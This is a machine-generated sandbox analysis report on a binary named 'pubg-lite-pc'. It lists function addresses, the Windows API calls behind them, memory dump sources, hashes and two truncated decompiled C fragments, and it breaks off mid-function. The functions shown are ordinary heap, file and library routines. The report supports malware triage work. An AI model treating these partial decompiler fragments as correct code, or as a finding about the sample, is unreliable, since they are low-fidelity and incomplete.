                                                                                                0x6d983500
                                                                                                0x00000000
                                                                                                0x6d983500
                                                                                                0x6d98349a
                                                                                                0x6d98349f
                                                                                                0x6d9834a3
                                                                                                0x6d983533
                                                                                                0x6d983538
                                                                                                0x6d98353d
                                                                                                0x6d98353e
                                                                                                0x6d98353f
                                                                                                0x6d983540
                                                                                                0x6d983541
                                                                                                0x6d983543
                                                                                                0x6d983548
                                                                                                0x6d98354b
                                                                                                0x6d983551
                                                                                                0x6d983551
                                                                                                0x6d983559
                                                                                                0x6d9834a9
                                                                                                0x6d9834b1
                                                                                                0x6d9834b3
                                                                                                0x6d9834c7
                                                                                                0x6d9834c9
                                                                                                0x6d9834cc
                                                                                                0x6d9834d0
                                                                                                0x6d9834d0
                                                                                                0x6d9834d3
                                                                                                0x6d9834d6
                                                                                                0x6d9834e6
                                                                                                0x6d9834e6
                                                                                                0x6d983502
                                                                                                0x6d983502
                                                                                                0x6d983509
                                                                                                0x6d983515
                                                                                                0x6d983532
                                                                                                0x6d983532
                                                                                                0x6d9834a3

                                                                                                APIs
                                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001C,00000000,E85BFA76,?,E85BFA76,6D9B926E,000000FF), ref: 6D983490
                                                                                                  • Part of subcall function 6D966B50: GetProcessHeap.KERNEL32 ref: 6D966BAC
                                                                                                • FreeLibrary.KERNEL32(00000000,?,80004005), ref: 6D98354B
                                                                                                  • Part of subcall function 6D967E50: FindResourceW.KERNEL32(00000000,?,00000006,00000000,?,?,6D9834C5,-00000010), ref: 6D967E88
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66249601423.000000006D941000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D940000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66249463542.000000006D940000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66254569554.000000006D9BB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256348275.000000006D9E5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256907548.000000006D9F1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6d940000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: FindFolderFreeHeapLibraryPathProcessResourceSpecial
                                                                                                • String ID:
                                                                                                • API String ID: 584424649-0
                                                                                                • Opcode ID: d94dad14798be737581c20d8860a75737a2a99b978d0a9a962ed8c2eb7db48d8
                                                                                                • Instruction ID: a50f85528a5de28645f2c746b9e404c49c69c8323ad5b735569af8dfba848dfb
                                                                                                • Opcode Fuzzy Hash: d94dad14798be737581c20d8860a75737a2a99b978d0a9a962ed8c2eb7db48d8
                                                                                                • Instruction Fuzzy Hash: 7031DF706082499FEB24CF68D818BAE7BF8EF04B08F00455DE91ADB681DB71E604CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009EF600 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FreeLibrary.KERNEL32(00000000,?,009D172C,F4D3B90A,00000000,00000000), ref: 009EF665
                                                                                                • CloseHandle.KERNEL32(?,?,009D172C,F4D3B90A,00000000,00000000), ref: 009EF6B9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseFreeHandleLibrary
                                                                                                • String ID:
                                                                                                • API String ID: 10933145-0
                                                                                                • Opcode ID: 7e164a779a878a4e6d892014564558badb127954017635bc4605c127d2554d8d
                                                                                                • Instruction ID: 92ad1a32b40dc6e04e4496d5d34a46611f4c258bf25219bc966eccb924ed93dd
                                                                                                • Opcode Fuzzy Hash: 7e164a779a878a4e6d892014564558badb127954017635bc4605c127d2554d8d
                                                                                                • Instruction Fuzzy Hash: 1B211C70700645AFD711CF6ADD5CB9ABBECFB14B14F00462AE425CB3A0DBB99A04CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009B1E00 Relevance: 3.0, APIs: 2, Instructions: 41windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 009B7020: LoadLibraryW.KERNEL32(ComCtl32.dll,F4D3B90A,00000000,?,00000000), ref: 009B705E
                                                                                                  • Part of subcall function 009B7020: GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 009B7081
                                                                                                  • Part of subcall function 009B7020: FreeLibrary.KERNEL32(00000000), ref: 009B70FF
                                                                                                • SendMessageW.USER32(?,00000080,00000001,00000000), ref: 009B1E44
                                                                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 009B1E4F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryMessageSend$AddressFreeLoadProc
                                                                                                • String ID:
                                                                                                • API String ID: 3032493519-0
                                                                                                • Opcode ID: e474fc240f59c533507c4fdd77389cea3c0d3a44570329f13887088955267c5f
                                                                                                • Instruction ID: e6b63dea8e803ab7f1ae26321566de7f9de32805b1b48d2dcfb9471e38bc586a
                                                                                                • Opcode Fuzzy Hash: e474fc240f59c533507c4fdd77389cea3c0d3a44570329f13887088955267c5f
                                                                                                • Instruction Fuzzy Hash: 8CF0393278531837F660219A5C57F6BB64EDBC1B74F104266FA98AB2C2ECC67C0442E9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00A5864A Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LCMapStringEx.KERNEL32(?,00A575AA,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00A5867E
                                                                                                • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00A575AA,?,?,00000000,?,00000000), ref: 00A5869C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: String
                                                                                                • String ID:
                                                                                                • API String ID: 2568140703-0
                                                                                                • Opcode ID: b68159386133556752ec0a376d29206cc91e6134dcae16d3aa4cf532d243c7d8
                                                                                                • Instruction ID: 0e6c99032656e0d405133a6afc30ea23894a53842536efd3fa8a1dc5c41f241f
                                                                                                • Opcode Fuzzy Hash: b68159386133556752ec0a376d29206cc91e6134dcae16d3aa4cf532d243c7d8
                                                                                                • Instruction Fuzzy Hash: 08F0643210051AFBCF12AFA0DC05DDE3F6ABB483A1F058111BE1825121CB3AC972AB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00A56178 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RtlFreeHeap.NTDLL(00000000,00000000,?,00A5A487,?,00000000,?,00000000,?,00A5A72A,?,00000007,?,?,00A5ADC3,?), ref: 00A5618E
                                                                                                • GetLastError.KERNEL32(?,?,00A5A487,?,00000000,?,00000000,?,00A5A72A,?,00000007,?,?,00A5ADC3,?,?), ref: 00A561A0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 485612231-0
                                                                                                • Opcode ID: 2814bbf41d504cd54d10e0707ff54a1d744c870c083025f9b6c0043f7cef01cc
                                                                                                • Instruction ID: d937bb611e0b26cdc59c11f47ea68e89af08d29bb1848029921e761267b75744
                                                                                                • Opcode Fuzzy Hash: 2814bbf41d504cd54d10e0707ff54a1d744c870c083025f9b6c0043f7cef01cc
                                                                                                • Instruction Fuzzy Hash: 3FE08C32180604ABDB21AFF1AC4DB997BA8BB50352F108026F9088B172DEB19985D798
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00A5607D Relevance: 2.6, APIs: 2, Instructions: 69COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(00000000,?,00000000,00A4A2EE,00A57F28,?,?,00A47201,00000001,00000028,?,00A47176,?,?,0094EFAD,009B1580), ref: 00A56082
                                                                                                • SetLastError.KERNEL32(00000000,00000002,000000FF,?,?,00A47201,00000001,00000028,?,00A47176,?,?,0094EFAD,009B1580,?,00000008), ref: 00A56120
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 1452528299-0
                                                                                                • Opcode ID: c392d95c8fd931fb371486f996c5455858b8421dd0ae0c0ab8cf84a38c900f0b
                                                                                                • Instruction ID: 2bb113d4b5f3fad502ddc706ba255117821b4d7438f9e94be5b46abdcdb001d1
                                                                                                • Opcode Fuzzy Hash: c392d95c8fd931fb371486f996c5455858b8421dd0ae0c0ab8cf84a38c900f0b
                                                                                                • Instruction Fuzzy Hash: 0611A9322059026EDA62B7F89D85D3B216ABBC17B7BA44324FE15971E2DE758C0E9120
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009D2690 Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • EnumResourceLanguagesW.KERNEL32(00000000,00000010,00000001,009D2870,?), ref: 009D26DB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: EnumLanguagesResource
                                                                                                • String ID:
                                                                                                • API String ID: 4141015960-0
                                                                                                • Opcode ID: 9c3b0c95678d22273aa17e7e621c0421b40f70dd1a8def0f7299f00ed649527b
                                                                                                • Instruction ID: 4f2c91c6047b985d7bc72ea1f5f226408a121c4cf5059944c93f8512206d517d
                                                                                                • Opcode Fuzzy Hash: 9c3b0c95678d22273aa17e7e621c0421b40f70dd1a8def0f7299f00ed649527b
                                                                                                • Instruction Fuzzy Hash: 2461A375A0120A9BDB20CFA4C980B9EF7F8FF58304F10426AE814AB741D775ED45CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00A5B12D Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetCPInfo.KERNEL32(E8458D00,?,?,?,00000000), ref: 00A5B15F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Info
                                                                                                • String ID:
                                                                                                • API String ID: 1807457897-0
                                                                                                • Opcode ID: 63596edf7024c00d722ba0037a816740c3aea58a8c65260ebd0932bcd15d868f
                                                                                                • Instruction ID: 92e3b76dcf89320cfdbca129ce3590dceffd0edbf3ff3d67a06e9fcf249164fc
                                                                                                • Opcode Fuzzy Hash: 63596edf7024c00d722ba0037a816740c3aea58a8c65260ebd0932bcd15d868f
                                                                                                • Instruction Fuzzy Hash: DE4126B05146489FEB21CB58CD94BFEBBFDFB55706F2404ADE98A87042D330A9499B70
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009B2830 Relevance: 1.6, APIs: 1, Instructions: 105COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetTempPathW.KERNEL32(00000104,?,F4D3B90A,00000000,F4D3B90A,00A802DE,000000FF), ref: 009B287F
                                                                                                  • Part of subcall function 009292F0: GetProcessHeap.KERNEL32 ref: 00929345
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: HeapPathProcessTemp
                                                                                                • String ID:
                                                                                                • API String ID: 1245588190-0
                                                                                                • Opcode ID: d8e2b37dfa884cd8211fe8210ae365637b80e82104d33fb80803505ab026ea53
                                                                                                • Instruction ID: 08c3818c485d74449803a15f3115d13dbbc619daed0865c9b0de948df583dd81
                                                                                                • Opcode Fuzzy Hash: d8e2b37dfa884cd8211fe8210ae365637b80e82104d33fb80803505ab026ea53
                                                                                                • Instruction Fuzzy Hash: C231B570A00259DFDB14EFA8DA49BEE77E8FF44314F10452DE81ADB281EB749605CB44
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009EF780 Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,009D06E0,?,00000000,00000000,?,?), ref: 009EF79D
                                                                                                  • Part of subcall function 00928FC0: RtlAllocateHeap.NTDLL(?,00000000,?,F4D3B90A,00000000,00A65840,000000FF,?,?,00AF91CC,?,009EAA18,80004005,F4D3B90A), ref: 0092900A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocateCreateFileHeap
                                                                                                • String ID:
                                                                                                • API String ID: 3125202945-0
                                                                                                • Opcode ID: 4808f971619784b4184ebb25597eddc29a942da6d6dd7dc9c5deb353d8e6647c
                                                                                                • Instruction ID: aa0ffd0f436b03434bcbdf3da3ffbc4467a48a1686c9618215a3f8c08385f8cd
                                                                                                • Opcode Fuzzy Hash: 4808f971619784b4184ebb25597eddc29a942da6d6dd7dc9c5deb353d8e6647c
                                                                                                • Instruction Fuzzy Hash: AC21F835600B00DFD325DF28D898B56B7E4FF88300F20895DE59A97360D731AA41CB55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00928FC0 Relevance: 1.5, APIs: 1, Instructions: 34memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00A47ADA: RaiseException.KERNEL32(E06D7363,00000001,00000003,F4D3B90A,?,?,80004005,F4D3B90A), ref: 00A47B3A
                                                                                                • RtlAllocateHeap.NTDLL(?,00000000,?,F4D3B90A,00000000,00A65840,000000FF,?,?,00AF91CC,?,009EAA18,80004005,F4D3B90A), ref: 0092900A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocateExceptionHeapRaise
                                                                                                • String ID:
                                                                                                • API String ID: 3789339297-0
                                                                                                • Opcode ID: a3ef6cdceea124b7d82af59e5c2d2e2e1a4dbaf6a7ea098a3c5260897e0c80c0
                                                                                                • Instruction ID: 68b21e4085810dc4a5db28b49c206149fde43bbd1808ec0bff22032c4bc2dcce
                                                                                                • Opcode Fuzzy Hash: a3ef6cdceea124b7d82af59e5c2d2e2e1a4dbaf6a7ea098a3c5260897e0c80c0
                                                                                                • Instruction Fuzzy Hash: B5F0A731A48648FFC701CF94DD01F5ABBA9F748B10F004A29F91587A90DB35A911CA44
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6D966820 Relevance: 1.5, APIs: 1, Instructions: 34memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 30%
                                                                                                			E6D966820(char _a4) {
				long _v8;
				char _v28;
				signed int _t11;
				void* _t14;
				char* _t15;
				signed int _t21;

				_t15 =  &_a4;
				E6D966810(_t15, _a4);
				L6D98C5AA(_t15, 0x6d9e3a44);
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_push(0xffffffff);
				_push(0x6d9a7310);
				_push( *[fs:0x0]);
				_t11 =  *0x6d9e5024; // 0xe85bfa76
				_push(_t11 ^ _t21);
				 *[fs:0x0] =  &_v28;
				_t14 = RtlAllocateHeap( *(_t15 + 4), 0, _v8); // executed
				 *[fs:0x0] = _v28;
				return _t14;
			}









                                                                                                0x6d966824
                                                                                                0x6d966828
                                                                                                0x6d966835
                                                                                                0x6d96683a
                                                                                                0x6d96683b
                                                                                                0x6d96683c
                                                                                                0x6d96683d
                                                                                                0x6d96683e
                                                                                                0x6d96683f
                                                                                                0x6d966843
                                                                                                0x6d966845
                                                                                                0x6d966850
                                                                                                0x6d966851
                                                                                                0x6d966858
                                                                                                0x6d96685c
                                                                                                0x6d96686a
                                                                                                0x6d966873
                                                                                                0x6d96687e

                                                                                                APIs
                                                                                                  • Part of subcall function 6D98C5AA: RaiseException.KERNEL32(E06D7363,00000001,00000003,6D96CD5C,?,?,6D988A15,6D96CD5C,6D9E30AC,00000000,6D96CD5C,00000000,-00000002), ref: 6D98C60A
                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000000,?,E85BFA76,00000000,6D9A7310,000000FF,?,?,6D9E3A44,?,6D98353D,80004005), ref: 6D96686A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66249601423.000000006D941000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D940000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66249463542.000000006D940000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66254569554.000000006D9BB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256348275.000000006D9E5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256907548.000000006D9F1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6d940000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocateExceptionHeapRaise
                                                                                                • String ID:
                                                                                                • API String ID: 3789339297-0
                                                                                                • Opcode ID: a44f45108da9b939a780bf7409062fdd144032eb624fa66df636ac6702e3f81a
                                                                                                • Instruction ID: fdaba1c89668a05cd01e58434f440b30af8e601fc54c534acc55afc24c9ba209
                                                                                                • Opcode Fuzzy Hash: a44f45108da9b939a780bf7409062fdd144032eb624fa66df636ac6702e3f81a
                                                                                                • Instruction Fuzzy Hash: A9F08C32908148BBCB01CF54CD01F6ABBB9EB09B14F108A6DBA1986691DB36E810CB84
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00A561B2 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00A57401,?,00000000,?,00A4D009,?,00000004,?,?,?,?,00A55562), ref: 00A561E4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: 2c018872ff47b3d597d759f551027afa726f602977f1eba4ed412c1e0900c870
                                                                                                • Instruction ID: 9944c19a805929efe68aa08beadf27d254affe452f9e61d9d95d0bb71b8efaa4
                                                                                                • Opcode Fuzzy Hash: 2c018872ff47b3d597d759f551027afa726f602977f1eba4ed412c1e0900c870
                                                                                                • Instruction Fuzzy Hash: 1BE0A031580A2196D72127755D05B7AB698BB453A3B510321AC05A7192CE70DC4981A5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6D9970BE Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E6D9970BE(long _a4) {
				void* _t4;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(L6D991459(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
